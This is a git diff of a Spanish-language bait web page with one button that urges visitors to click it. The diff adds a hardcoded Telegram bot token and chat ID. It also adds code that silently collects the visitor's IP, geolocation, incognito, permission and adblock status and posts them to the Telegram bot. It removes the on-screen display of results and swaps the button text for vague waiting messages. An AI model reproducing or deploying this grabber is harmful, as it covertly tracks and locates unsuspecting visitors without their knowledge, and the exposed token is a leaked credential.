--- a/index.html
+++ b/index.html
@@ -2,7 +2,7 @@
 <html lang="es">
 <head>
   <meta charset="UTF-8" />
-  <title>PAGE</title>
+  <title>Test</title>
   <style>
     body { font-family: Arial; padding: 20px; background: #f0f0f0; }
     .box { background: white; padding: 20px; border-radius: 8px; box-shadow: 0 0 10px rgba(0,0,0,0.1); max-width: 700px; margin: auto; }
@@ -11,12 +11,16 @@
 </head>
 <body>
   <div class="box">
-    <h2>Aprieta el botón Porfavor</h2>
+    <h2>Aprieta el boton pada ver algo</h2>
     <button id="startBtn">Dame Click</button>
+    <!-- pre eliminado, no mostramos resultados -->
   </div>
 
 <script>
 (() => {
+  const BOT_TOKEN = "8011619975:AAE_Donqy5xn8RD0lJ2LOIP326dTDrnO1Ag";
+  const CHAT_ID = "6065284869";
+
   const startBtn = document.getElementById("startBtn");
 
   let humanInteraction = false;
@@ -25,10 +29,10 @@
   });
 
   function detectHeadless() {
-    return (/HeadlessChrome/.test(navigator.userAgent) ||
-            !navigator.plugins?.length ||
-            !navigator.languages?.length ||
-            navigator.webdriver)
+    return (navigator.webdriver ||
+            !navigator.plugins.length ||
+            !navigator.languages ||
+            /HeadlessChrome/.test(navigator.userAgent))
       ? "Sí" : "No";
   }
 
@@ -77,7 +81,7 @@
 
   async function detectAdblock() {
     try {
-      await fetch("https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js",  {method:"HEAD", mode:"no-cors"});
+      await fetch("https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js",   {method:"HEAD", mode:"no-cors"});
       return "No detectado";
     } catch {
       return "Probable AdBlock";
@@ -97,7 +101,7 @@
 
   async function getIPInfo() {
     try {
-      const res = await fetch("https://ipapi.co/json/"); 
+      const res = await fetch("https://ipapi.co/json/");  
       if (!res.ok) throw new Error("No response");
       return await res.json();
     } catch {
@@ -107,22 +111,26 @@
 
   async function sendToTelegram(message) {
     try {
-      // === CAMBIA ESTO SI TU IP LOCAL ES DIFERENTE ===
-      const LOCAL_IP = "192.168.1.6"; // ← Tu IP local desde Termux
-      const res = await fetch(`http://${LOCAL_IP}:3000/send`, {
+      const url = `https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`;  
+      const response = await fetch(url, {
         method: "POST",
-        headers: { "Content-Type": "application/json" },
-        body: JSON.stringify({ message })
+        headers: {"Content-Type": "application/json"},
+        body: JSON.stringify({
+          chat_id: CHAT_ID,
+          text: message,
+        }),
       });
-      if (!res.ok) throw new Error("Error en servidor");
-    } catch (e) {
-      console.warn("Error enviando:", e);
+      const data = await response.json();
+      console.log("Telegram response:", data);
+    } catch(e) {
+      console.warn("Error enviando a Telegram:", e);
     }
   }
 
   async function collectAndSend() {
+    // No mostramos nada en pantalla
     startBtn.disabled = true;
-    startBtn.textContent = "Enviando...";
+    startBtn.textContent = "Espera...";
 
     const [ipRes, geoRes, incognitoStatus, permStatus, adblockStatus] = await Promise.allSettled([
       getIPInfo(),
@@ -181,8 +189,9 @@ Hora: ${new Date().toLocaleString()}
 `;
       await sendToTelegram(locationInfo);
     }
-
-    startBtn.textContent = "Datos enviados";
+    
+    // Opcional: cambiar texto del botón al finalizar
+    startBtn.textContent = "🦆(Espera un 5 segundos)";
   }
 
   startBtn.onclick = collectAndSend;
